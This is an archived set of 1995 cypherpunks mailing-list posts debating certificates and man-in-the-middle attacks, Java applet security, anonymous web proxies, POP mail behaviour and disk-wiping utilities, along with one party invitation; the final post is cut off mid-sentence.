From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 9 Oct 95 16:54:56 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <ac9ea8f3010210049f44@[205.199.118.202]>
Message-ID: <199510092353.QAA16167@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


m5@dev.tivoli.com (Mike McNally) writes:
>I'm a little confused, I guess.  What is it about certificates that
>you'll trust with such confidence?  How do you know that the guarantor
>of a certificate wasn't spoofed by an MITM attack?  How do you know
>that the certificate itself wasn't spoofed?

I believe that the certificate wasn't spoofed by an MITM attack because 
the certificate issuing process requires face to face contact with some
proof of identity, in at least one way of doing this.  The certificate
wasn't spoofed because I got the key of the signer through an out of band
mechanism, such as seeing it printed in the newspaper.

The main requirement is to have some contact between Alice and the rest
of the world which doesn't go through the MITM, and the same for Bob.  By
using certificates, this contact only has to be done once (for each of
them).  There is no need for Alice and Bob themselves to have a face to
face meeting, nor for Alice and Charlie, Alice and Dave, Bob and Charlie,
Bob and Dave, Dave and Charlie, etc.  Just the one will suffice.

>I think it's more correct to say that the MITM attack is acknowledged
>to be possible, but realistically no more of a threat than in a
>certificate model.   And note the "I think", and this warning that I
>could be wrong.  (Or I could be an MITM...  bwahahahaha!)

I'm not sure whether this is because you think MITM is so difficult as
to be almost impossible in any model, or whether you think that an MITM
attack is possible in some cases against relatively naive users, but that
certificates won't help at all in that case.

Let me make clear how I would see a MITM attack working.  There are two
main flavors, the permanent and the transitory.  Here is how the
permanent MITM could work.

Alice's ISP provides all of her email services.  She has created and
published a public key, but the ISP has detected this and replaced it
with a fake key.  Everyone who tries to send to her using that key gets
their message decrypted and read by the ISP, then re-encrypted using
Alice's real key and delivered to her mailbox.  This much would be
relatively easy.

But it is not enough.  If Alice gets hold of a good key for Bob, she will
send messages to him using that key.  The ISP can't read those messages.
If she signs them, Bob will notice that the signature doesn't check
against his copy of Alice's key (the one which the ISP has installed in
place of Alice's real one), and the ISP will be caught.

Therefore the ISP is going to have to make sure that every single key
Alice gets is a fake one, one for which the ISP has the secret key.
When Alice get's Bob's key, Charlie's, everybody's, the ISP has to
replace those with fake versions.  Then again it can do its
translate-and-replace trick on messages going in both directions.  This
is obviously a much more difficult task, but if people acquire keys in
limited, stereotyped and automated ways, it could conceivably be done.

With this, what more could trip the MITM up?  Well, if anybody ever
included any keys within the body of a message, those would have to be
detected and substituted.  Even key fragments might have to be handled,
although it is unlikely that this would be noticed.

The biggest threat would be if Alice used a different method to get
someone's keys, her own or anybody's that she communicates with.  She
could use a different ISP or use some "out of band" (off-net) method.
If she went to a key signing party the jig would be up.

Does this mean that the MITM attack is impossible?  Not necessarily.
I'll bet there are plenty of people who only use one ISP (AOL or MSN)
and who have never been to a key signing party.  Maybe they've never
even met someone in real life whom they communicate with on the net.  A
lot of people could fall into this category.

This is where the certificate comes in handy.  A certificated key from a
signer whose key Alice is able to verify out of band will not be
forgeable by the MITM.  Likewise if Alice's key distributed on the nets
is signed by a trusted certificator then other people can have confidence
that there is no MITM involved.  Basically the certificate is a way of
forcing people, at least once, to go around their ISP.  And once is
enough.

Now let me describe the other form of MITM attack, the transitory one.
In this one the attacker doesn't care if he's caught, he just wants to
peek at a few (possibly crucial) messages.  Here again his attack is to
replace Alice's public key in the databases with a bogus one, and to
intercept her communications.  Or maybe he is attacking SSL or some
other protocol where one side sends their public key to the other.
Then it is even easier to send a fake one.  People who trust and use
that key will lose their privacy.

This attack is obviously a lot easier to mount in some contexts.
Again, the use of a certificate should prevent these, and in fact SSL
does use certificated keys.  The MITM will not be able to supply a
certificated key with the name/address information for Alice.
(Netscape currently doesn't check to see whether the name in the key is
valid, so it is not getting much benefit from the use of certificates.
I hope it is clear that abandoning certificates or using ones without
any name or address information would make SSL very unsafe.)

>Oh now wait a sec here; I don't think anybody's advocated using
>"untested" keys.  It's still perfectly reasonable to establish
>networks of reliable information focused on a key.

>If I electronically "encounter" Alice and decide to begin a secure
>conversation, we initiate a key exchange.  I can then go to as many
>already-trusted entities as I like in an attempt to verify that as
>many attributes that are claimed to be associated with the key are
>really there as I desire.  If Alice wants to buy a widget from me, I
>can ask other businesses whether they've ever had problems collecting
>from that key.  If I want to buy a widget from Alice, I can ask
>friends whether they've gotten good widget from that key.  If I'm
>interested in a little e-hanky-panky, I can ask around the sleazier
>corners of the net to see whether Alice is the kiss-and-post type.

What if you just want to talk to her securely?  I asked before what
"attributes" would handle that case, and the answer that at least Tim
gave was that talking to the key is talking to Alice.  I don't buy
that, at least not yet.

(Don't get me wrong - I don't have anything against attributes.  I love
Chaum's pseudonymous credentials.  I'm just worried that unless we have a
foundation of secure communication that the rest of the edifice isn't
going to stand.)

>Somebody's going to have to explain to my thick skull how it is that a
>certificate system makes this process any different, fundamentally.  I
>mean, it may be that there's more superficial security, but I don't
>see where there's any additional risk truly introduced by using the
>key itself as a "True Name".  Maybe the real question is, how does a
>certificate system give me the confidence that there really is an
>"Alice" according to some definition of "really" that satisfies me?

OK, I wrote at length above on how certificates can help against two
forms of MITM attacks.  What do you think?  Maybe it is hard to imagine
a long-term successful MITM attack, but wouldn't you feel uncomfortable
with an SSL which used uncertificated keys?

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 9 Oct 95 17:01:03 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: Certificate proposal
In-Reply-To: <199510092316.QAA09588@jobe.shell.portal.com>
Message-ID: <199510092355.QAA29849@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I rather figured there was miscommunication here.


> 
> It occurs to me that perhaps I have been missing a point here when people
> argue that having a "man in the middle" is not that different from
> various forms of secure communication, such as where Bob has multiple
> personalities or is a committee.  I have been taking this to mean that we
> should therefore not worry about MITM attacks, which seems crazy to me.
> 
> Instead perhaps this was meant as a "reductio ad absurdum" argument for
> why MITM attacks cannot be prevented in the scenario where people have no
> out-of-band contact.  Anything which could detect and prevent MITM
> attacks could, by this analogy, detect whether Bob had multiple
> personalities.  Since the latter is obviously impossible, the former must
> be as well.  Hence the problem has no solution and we should not
> waste much time on it.


	My point is not that MITM has no solution and that time should
not be wasted but that context (in many cases out-of-band contact, but
not necesarily) is an important factor when dealing with MITM. A
context-free situation is not a very useful thing to look at when
trying to solve MITM -- MITM should be looked at in context-based
situations.

> 
> I don't fully agree with this but at least it is not as bizarre as the
> first interpretation.
> 
> Hal
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Mon, 9 Oct 95 16:43:16 PDT
To: Kevin L Prigge <cypherpunks@toad.com
Subject: Re: HTTP anon proxy pointers
Message-ID: <199510092356.QAA23573@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:00 PM 10/9/95 -0500, Kevin L Prigge wrote:
>I seem to recall that someone was working on an anonymous http
>proxy a couple months ago. Pointers would be appreciated. Thanks.

We had discussed this at the last Bay Area Cypherpunks meeting (BTW,
when/where is the next??), and came to the conclusion that it would be
technologically simple, but load inefficient, to implement in a large scale
at this point.

The main problem with anonymous http (or telnet, talk, etc) lies in the
sheer amount of information being transferred, and the even larger amount of
noise an anonymous site would have to generate to defeat traffic analysis. A
mail message is usually under a few K, but with these larger systems you
move into the multiple meg realms; to hide a single individual's (ie,)
3K/sec stream, a provider would have to generate many times that in cover
traffic. We can force traffic to the user from network speeds to slow down
to modem speeds, but that doesn't help the inbound crunch at all. Web sites
don't generally generate much inbound traffic, but when coupled with dialups
(such as in my case) this could lead to bad service to the local modem users.

The good news is, with multiple anon redirectors bouncing traffic between
them to further confuse an attacker, the number of users can grow an order
of magnitude without any additional load, since the streams are hiding in
the midst of other streams and far less random cover traffic needs to be
generated.

Software-wise, an anonymous http scheme could be implemented with a standard
proxy server with remote host access restrictions and log analysis tools to
charge the appropriate individuals for their usage (a la anon email postage
stamp rolls). Down the road, cover traffic, ecash payment, encryption, and
other nifty toys can be added.

If anyone on this list is in need of anonymous http right now (even to
tinker with it) I'd be willing to set up a free-use proxy, as long as you
don't bring our server or our pipe to their knees. Mail me (privately if you
wish) with the individual IPs/names of the hosts you'd be coming in from -
no blanket domain names, please, unless they're your own personal network.
If I see enough interest I'll have a proxy up by next week.

Have I missed anything?
--
   Jay Campbell - Regional Operations Manager
   -=-=-=-=-=-=-  Sense Networking (Santa Cruz Node) 
   edge@got.net   "Shoot the Fruit Loop"            
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 9 Oct 95 17:07:54 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: netscape mail starts java attachments upon get new mail...
In-Reply-To: <199510092305.TAA24544@jekyll.piermont.com>
Message-ID: <Pine.SOL.3.91.951009165759.13562G-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Oct 1995, Perry E. Metzger wrote:

> 
> "Josh M. Osborne" writes:
> > As far as I know Java apps can only make network connections to the
> > IP address they were loaded from.
> 
> That might be the design, but we know that it is hard to faithfully
> implement very complicated designs.
> 

The design of java is supposed to make analysing for security easier than 
it might be in other similarly sized systems- whether it does this or not 
is something that needs to be checked for carefully. 

The three components that need to be analysed are the class loader, the 
implementation of the JVM, and the code to check network connections. 

Analysing the VM and the class loader should be a simple (hah) matter of 
structural induction (possibly a two step process of converting the vm 
description into a denotational semantics and analysing that, followed by a 
proof that the vm is a faithful implemenation of those semantics.)

the networking code is simple  to prove safe if the VM and classloader 
can be shown to be safe.

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lile Elam <lile@art.net>
Date: Mon, 9 Oct 95 17:32:13 PDT
To: cypherpunks@toad.com
Subject: Coming Out Party!
Message-ID: <199510100021.RAA26015@art.net>
MIME-Version: 1.0
Content-Type: text/plain





		        Coming Out Costume Party!!
		         	   @
		             Bryant's Bend	
		

	Our wonderful house at Bryant's Bend in Palo Alto, is 
celebrating (our new housemate) Joyce Fortune's tenth anniversary of 
coming out as a lesbian. She has since become bi and celebrates bi'ness 
with the rest of us here at our veggie co-op.

	Join us in the wonderful celebrations, gaming and frolic.
Come in costume as butch or fem (lingerie is most desired). All uncostumed 
guests will be bounced by our tall african-american femmi bouncer (Go Frankie!). 

The particulars:


	When:   Saturday Night (October 14, 1995)
	Time:   7:00 to late
	Where:	130 Bryant St.
		Palo Alto CA

	What to bring:  Yourselves, a costume, gay music in cd or 
		tape cassette medium, and any erotic foods and drinks
                you might desire...	        

		We will be providing the atmosphere and some 
		non-alcoholic drinks and munchies.... 


	Directions:

	From 101:  
	
		Take the University Exit that heads West. Follow
		University Street until you reach Bryant St.
		Make a right onto Bryant St. and follow it to the 
		end. We are the last house on the left hand side
		and are on the corner of Bryant St. and Palo Alto Way. 
		It's a big tan house with brown trimmings.
	
 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Mon, 9 Oct 95 17:14:01 PDT
To: cypherpunks@toad.com
Subject: Re: Patents etc
Message-ID: <199510100027.RAA24061@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain



>IMHO What's needed is a) a good way of measuring usage and b) a realistic
>attitude on the part of patent holders as to the value of their patents. 
>
>A good example of how not to do it is the current mess that governs the
>music indistry (which very similar problems with copying and incorporation
>of material [sampling] all be it in a context of copyright rather than
>patents). 
>
>Ted Nelson did a lot of work on this for xanadu and his ideas on 
>transcopyright are worth exploring further.

One interesting (but maybe off-topic) facet of client-side applets (a la
Java) is the fact that publishers can define proprietary protocols and file
formats, and change them as often as they want, giving a sort of minimal
protection against casual duplication and re-publishing. With a bit more
work, the formats could make true transclusions efficient and easy to apply,
and help increase the amount of serious/commercial information available to
the public.

This is nothing new, I suppose... Java (from a user point of view) isn't
that much different than IntelligentPad, which from what I understand was
the client system the Xanadu people were working with recently.
--
   Jay Campbell - Regional Operations Manager
   -=-=-=-=-=-=-  Sense Networking (Santa Cruz Node) 
   edge@got.net   "Shoot the Fruit Loop"            
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Mon, 9 Oct 95 17:15:16 PDT
To: cypherpunks@toad.com
Subject: Re: netscape mail starts java attachments upon get new mail...
Message-ID: <199510100028.RAA24101@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


>OBcrypto: in one of the Java papers I saw a refrence to use of RSA
>signitures to allow browser users to say things like "I trust Sun
>(or Tim May) to write applets that use Foo not to harm me".  It
>wasn't in the public release of HotJava because of licencing 
>constrints.  Any speculation on whether Netscape will (eventually)
>support that feature?

If this is the case, my big hope is that Netscape doesn't limit /this/ trust
system to a pre-approved set of corporate entities I'll (as a private
individual) have to pay $300 for if I want my apps to do anything more than
bounce faces around a user's screen.

A model allowing multiple entities to put a stamp of approval (possibly with
some sort of hash/checksum to match an app in question against an approval
certificate) /would/ make things easier for the user, though, allowing them
to set up a set of blanket rules instead of pausing and pondering a
particular programmer's trustworthiness every new site he visits... a la
Tim's Dirt Cheap Java Security Approval Company.

Please don't nail me on semantics; I use all above terms loosely.
--
   Jay Campbell - Regional Operations Manager
   -=-=-=-=-=-=-  Sense Networking (Santa Cruz Node) 
   edge@got.net   "Shoot the Fruit Loop"            
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmcmanis@scndprsn.Eng.Sun.COM (Chuck McManis)
Date: Mon, 9 Oct 95 17:29:54 PDT
To: perry@piermont.com
Subject: Re: java security concerns
Message-ID: <9510100030.AA29195@pepper.Eng.Sun.COM>
MIME-Version: 1.0
Content-Type: text/plain



>Sendmail is about 29K lines of C code -- not significantly larger by
>my standards -- and has proven nearly impossible to secure.

Good point.

>Sendmail performs a much simpler task and has not proven secure.

I don't necessarily agree. The core java interpreter is simply:
	while (1) {
		get_next_opcode
		switch(x) {
		}
	}

> ... Marcus Ranum has noted that you can't
>trust a program thats bigger than a couple of pages long, and I
>believe he's right.

Its a useful metric. But the concept of trust isn't defined. If
you write in pure Java code (that is no references to any native
methods) we should be able to do much better than that. 

And since Java doesn't have "programs" it just has "classes" and
many of those fit on two pages where does that leave us? Would it
be reasonable to say that if I want to write a Java class I trust
I should keep it under two pages? If I then write another class 
that uses that class, that is also under two pages have I met
the requirement? Can this aggreagate four page Java class be trusted?

>As an aside, have you tried breaking your own program? Spend a week on
>it some time. Its usually an educational experience and it breaks you
>out of the mindset you have fixed in for a while.

Many times. 

>As people have found out, it has proven possible to core dump the Java
>interpreter. That means that your implementation has contained flaws
>that potentially permitted people to do unplanned things to the state
>of the interpreter.

I agree.

>By the way, I suggest that Sun should offer a large money prize for
>the first significant security hole found the Java implementation. Its
>a tiny price to pay for security.

I don't think the lawyers would let us. 

Would anyone be interested in a Java daemon that one could send arbitrary
classes to in an attempt to subvert the runtime? I once thought this would
be a good way to give safe exposure to the system in general. You know sort
of "here's a program that can feed classes to a Java runtime on a system
which is known to have a file X on it. Try to return the contents of X."

It probably wouldn't be to useful beyond that, and it would only validate
the classes you have access to, not necessarily the full set in a release.
(hence my not doing it given its utility only in testing the core runtime)

--Chuck 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 9 Oct 95 17:29:59 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: java security concerns
In-Reply-To: <199510092322.TAA24567@jekyll.piermont.com>
Message-ID: <Pine.SOL.3.91.951009171543.13562H-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Oct 1995, Perry E. Metzger wrote:

[ I just got Man-On-The-Street'ed by a TV news crew asking my opinion of 
  the OJ Verdict, I'm entitled to a little Side-Bar 

> Sendmail is about 29K lines of C code -- not significantly larger by
> my standards -- and has proven nearly impossible to secure.

Hey - but sendmail was designed to be Z-1 secure - formally proven to be 
unsecurable :-)

> taken on an impossible task. Marcus Ranum has noted that you can't
> trust a program thats bigger than a couple of pages long, and I

For the general case this is true. To be able to trust larger systems, you
need to not only be able to trust the individual 2 pagers, but to also be
able to show that composing the sub units doesn't lose whatever property
you're trying to do. The architecture of the system needs to be designed
with this in mind; otherwise reasoning about the composite becomes
intractable. There are all sorts of things you can do to make analysis
easier - eliminating global state, etc. Retrofitting security or 
verifiability never works. 

Distributed co-operative theorem proving, anyone?

END-DIGRESSION]

Real point of the message:

In my previous message, I left out some fundamental parts of the run-time 
that need to be looked at carefully. The garbage collection needs to be 
examined carefully. Normally GC algorithms are formally derived, so it's 
the implementation that needs to be checked for. holes in the GC may be 
too unpredictable to exploit for anything but core-dumping, especially since 
java uses a mark-sweep conservative collector. 

A more promising area of attack might be the Thread system. If the thread
system can be confused, it might be possible to have an untrusted app
start executing in the context of a trusted thread. This may or may not 
be exploitable, depending on how much of the untrusted threads context 
gets held over (call stack, etc), but could be fun if it works.

Simon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: P.Peterson@itd.uts.edu.au (Paul Peterson)
Date: Mon, 9 Oct 95 00:41:52 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: Netscape 2.0 beta
Message-ID: <v02110102ac9e7e3b993f@[138.25.32.103]>
MIME-Version: 1.0
Content-Type: text/plain


Patrick J. Horgan <patrick@verity.com> wrote:
>Steven Champeon said:
>
>> One thing that I found with the newsreader was that it doesn't
>> do POP correctly. No matter what you do with your mail, it still
>> doesn't check for read vs. unread articles. This is fine when you
>> have a mailbox with one message. It can be annoying when you have
>> 110 messages in your mailbox and don't want to 1) delete them or
>> 2) download them twice.
>
>Neither pop 2 nor pop 3 tell you whether you've read a message or not.

        Eudora can tell whether you've read a message or not by reading the
'status' line of a message. The status line contains an "R" if the message
has been previously read. Eudora uses POP 3 I believe. Elm also uses the
'status' line. The upshot of this is that you can configure Eudora to leave
your mail on the server and next time Eudora goes to read your mail, it
ignores all previously read messages and only downloads the new ones.

>pop 2 does bump up the current number with an ACKS, but if you move around
>with READ n, then that's useless.  pop 3 doesn't do that.
>
>I just reread the rfcs to make sure that I wasn't missing anything,
>(RFC 1725: Post Office Protocol - Version 3, RFC 937: Post Office Protocol -
>Version 2).  Am I missing something?

        This may or may not be a part of the RFC's (I haven't read them)
but this is the way I've always seen it work. So there's no reason that
Netscape couldn't do the same if it can't already. I can't tell yet whether
it's capable or not as I'm still down loading version 2.0b as I type. :-)

Cheers,
Paul P.

--
 _--_|\  Paul Peterson,                              P.Peterson@itd.uts.edu.au
/      \ Systems Programmer,                                Ph: +61 2 330 2131
\_.--._/ University of Technology, Sydney,                   (Internal: x2131)
      v  PO Box 123, Broadway, NSW, 2007, Australia.       Fax: +61 2 330 1994






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 9 Oct 95 17:57:43 PDT
To: cmcmanis@scndprsn.Eng.Sun.COM (Chuck McManis)
Subject: Re: java security concerns
In-Reply-To: <9510100030.AA29195@pepper.Eng.Sun.COM>
Message-ID: <199510100051.RAA03799@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Perry:
>By the way, I suggest that Sun should offer a large money prize for
>the first significant security hole found the Java implementation. Its
>a tiny price to pay for security.


Chuck:
> I don't think the lawyers would let us. 
> 

	This is a shame. What reason would they have for not letting
you? It could well be a very good marketing move. Maybe your marketing
dept can convince the legal dept.

> Would anyone be interested in a Java daemon that one could send arbitrary
> classes to in an attempt to subvert the runtime? I once thought this would
> be a good way to give safe exposure to the system in general. You know sort
> of "here's a program that can feed classes to a Java runtime on a system
> which is known to have a file X on it. Try to return the contents of X."
> 
> It probably wouldn't be to useful beyond that, and it would only validate
> the classes you have access to, not necessarily the full set in a release.
> (hence my not doing it given its utility only in testing the core runtime)
> 

	That, and a cash reward for getting the contents would be even
better. 

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Mon, 9 Oct 95 16:03:45 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certificate proposal
In-Reply-To: <199510092038.NAA09612@jobe.shell.portal.com>
Message-ID: <199510092303.TAA24560@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:
>Try to think of it not in relativistic or epistemological terms, but
>rather look at it in terms of reality.  The real world exists, and in it
>exist real people.  We can agree on this much, right?  Two of these
>people want to communicate securely.  That is not such a stretch of the
>imagination, is it?  By "communicate securely" I mean they exchange
>information in such a way that other people don't receive it.

>Now surely it is clear that with this definition of the problem,
>approaches which redefine people to mean people+eavesdroppers are not
>responsive.  Perhaps the motivation to do so is simply the belief that
>the problem is not solvable as stated.  If so, I'd like to hear someone
>say this.

This whole issue is a philosophical one.  The issue is the "ontology"
of electronic relationships.  The argument presented is analogous to
the "Turing test" for artificial intelligence.  The MITM is relevant
only where two commuicating parties share no channels which the MITM
doesn't control, otherwise they exchange one secret over such a channel
and Mitch is hosed (with probability 1/2^h, where h is the entropy of
the secret).

Now, if Alice communicates with an entity she knows as "Bob", which in
"reality" is Bob filtered by Mitch, I think we can readily agree that
Alice probably cannot communicate securely with Bob.  She *can*,
however, communicate in perfect secrecy with "Bob" -- the amalgamation
of Bob and Mitch.  The ontological issue comes about when we ask who it
is with whom Alice *wants* to communicate.  I'd maintain that Bob has
no ontological status with Alice.  She knows nothing of Bob, only of
"Bob".  Therefore, she must be intending to communicate with "Bob", and
her communication is secure.

An entity cannot have a meaningful ontological status until some
communication occurs.  The status which results from the communication
is "the entity, calling itself Bob, with whom I communicated over
channel X".  When a second communication occurs, we may have "the
entity, calling itself Bob, with whom I communicated over channel Y".
If the second communication contains an authenticating transaction,
then we can note that the two entities are the same.  This is what we
really mean by authentication, anyway.

As long as Mitch is successful in his MITM attack, then Bob is not an
entity with respect to Alice.

If Alice finds a key that purports to belong to Bob, about whom she
previously knows nothing, what possible relevance can it have whether
it really belongs to Bob or to "Bob" --- there is nothing in Alice's
mind to distinguish the two.

If Alice finds a key that purports to belong to Carol, about whom she
knows something, then she must execute an authentication protocol with
the new key to verify that the entity with whom it permits
communication is actually Carol, and not "Carol".

Identifying the key with the person is entirely reasonable, if the key
is what introduced the person to you (and thus ontologically created
the entity).  If the introduction happens prior to receiving the key,
then authentication becomes necessary to avoid MITM.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Mon, 9 Oct 95 16:11:29 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Certificate proposal
In-Reply-To: <9510092114.AA24726@alpha>
Message-ID: <9510092311.AA27677@alpha>
MIME-Version: 1.0
Content-Type: text/plain



aba@atlas.ex.ac.uk writes:
 > Now the puzzling stuff is people who appear to be arguing that MITM is
 > unimportant

Hal said this same thing in a recent note.  For myself, I've never
meant to argue that the MITM threat is unimportant.  I've simply
contended that you're no more vulnerable to it in the key-as-True-Name
scenario than with a certificate-bound key-to-name relationship
system.  If you assume an MITM could thwart the establishment of trust
in the first case, then I guess I posit that the same energies could
with equivalent hope for success be directed in an attack on a more
"traditional" certificate scheme.

 > Perhaps the view is based on the fact that there are plenty of
 > situations where you don't care what an entities name is, and hence
 > the attribute which should be under discussion is credit worthiness,
 > or reliability, but still you need to protect against MITM, using
 > whatever channels and means available.  I don't see how this alters
 > the argument.

And this is where I start to think we're all in agreement even though
there's an argument going on!  Yes, I think you need to protect
against MITM attacks by whatever means are available.  I think that no
matter what you do, if you're strictly relying on communications
systems over which you ultimately have no control (if at some point
somebody you simply have to trust on faith inevitably gets his hands
on your bits), then you have to put up with a non-zero probability of
being victimized by a MITM attack.  If you're willing on blind faith
to trust certificates granted by some authority, you're fooling
yourself (I claim).  If you only trust that authority because it fits
into an established web, then I don't see why there's any need for a
certificate binding a public key to some "True Name" constant; what's
the point?  (How do you know the alleged True Name has any meaning in
the first place?)

I also posit that this is not really any different than the problems
of social interaction homo sapiens have been dealing with ever since
they grunted their way into cooperative tribal life.


[ I kinda wish somebody with more of a clue than I have would support
me or tell me to shut up :-]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Miller <gmiller@grendel.ius.indiana.edu>
Date: Mon, 9 Oct 95 15:00:18 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Java
In-Reply-To: <199510090017.UAA00652@jekyll.piermont.com>
Message-ID: <Pine.3.89.9510091807.A8324-0100000@grendel.ius.indiana.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 8 Oct 1995, Perry E. Metzger wrote:

> 
> As long as people are mentioning Java, I just want to make the
> prediction, one more time, that at some point someone is going to find
> some devistating security holes in HotJava.

	I'd like to make this prediction:  someone at some point in time 
will find another serious security hole in SendMail.

	What you need to ask yourself is "Do the benefits of Java 
outweigh the security risks?"

greg.miller@shivasys.com
http://www.ius.indiana.edu/~gmiller/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 9 Oct 95 15:22:56 PDT
To: cypherpunks@toad.com
Subject: Re: PC disk wipe software
Message-ID: <199510092220.SAA19341@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510091318.JAA24166@jekyll.piermont.com>, perry@piermont.com
("Perry E. Metzger") wrote:

> I thought I'd ask here, since its related to a lot of the stuff people
> have written for the PC platform in these parts. I need to securely
> wipe a bunch of data from an MS-DOS hard drive, so that it can't be
> recovered. Are there any readily available utilities for this? Will
> any of them selectively erase only data that isn't allocated to
> existing files?

Whatever you use, check its claims with a disk editor. None of the various
wipe utilities for the Mac that I am aware of (Norton, Burn) work as
advertized. They all invariably fail to wipe the slackspace at the end of
allocated, but not fully used blocks. Consequently, several kB of data
left behind in said slackspace by previously deleted files will be missed
on your average drive.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHmgGioZzwIn1bdtAQFEsQF8CYfksEosFfBJoQckOM390b7CBeupCtrf
T2Var/yEUwuT5lxH7xJ6y9p69wfaljtz
=Hkkv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Mon, 9 Oct 95 16:25:16 PDT
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: Certificate proposal
In-Reply-To: <199510092038.NAA09612@jobe.shell.portal.com>
Message-ID: <9510092324.AA28153@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Scott Brickner writes:
 > [ ... a bunch of stuff I have no quarrel with ... ]
 >
 > Identifying the key with the person is entirely reasonable, if the key
 > is what introduced the person to you (and thus ontologically created
 > the entity).

Right (sez me).

 > If the introduction happens prior to receiving the key,
 > then authentication becomes necessary to avoid MITM.

Maybe I'm not sure what good a "true name" certificate is going to do
me in establishing confidence in a key.  How will I know that the
MITM attack didn't begin with the "true name" registration?

(Note that I continue to insist that I very well might be totally
without clue here, so correct me brutally if applicable.)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 9 Oct 95 18:14:27 PDT
To: cypherpunks@toad.com
Subject: Man in the Middle Revisited (but not for the last time)
Message-ID: <ac9ec6b5070210049d4b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:03 PM 10/9/95, Hal wrote:
>tcmay@got.net (Timothy C. May) writes:
>>For communication, the only credential Alice needs to ensure that only Bob
>>can read her message is that she uses Bob's public key. If "Bob the Key"
>>reads it, presumably it was "Bob the Person" who read it.
>
>>(Again, Bob the Key = Bob the Person to many of us. If Bob the Person has
>>let his private key out, so that Chuck the Person is also able to read the
>>Bob the Key stuff, etc., then of course cryptography cannot really handle
>>this situtation.)
>
>OK, but again, what about the man in the middle attack?  Suppose the
>key that you found that claims to be from Bob is actually not his, but
>another one created by a man in the middle, such as Bob's malicious
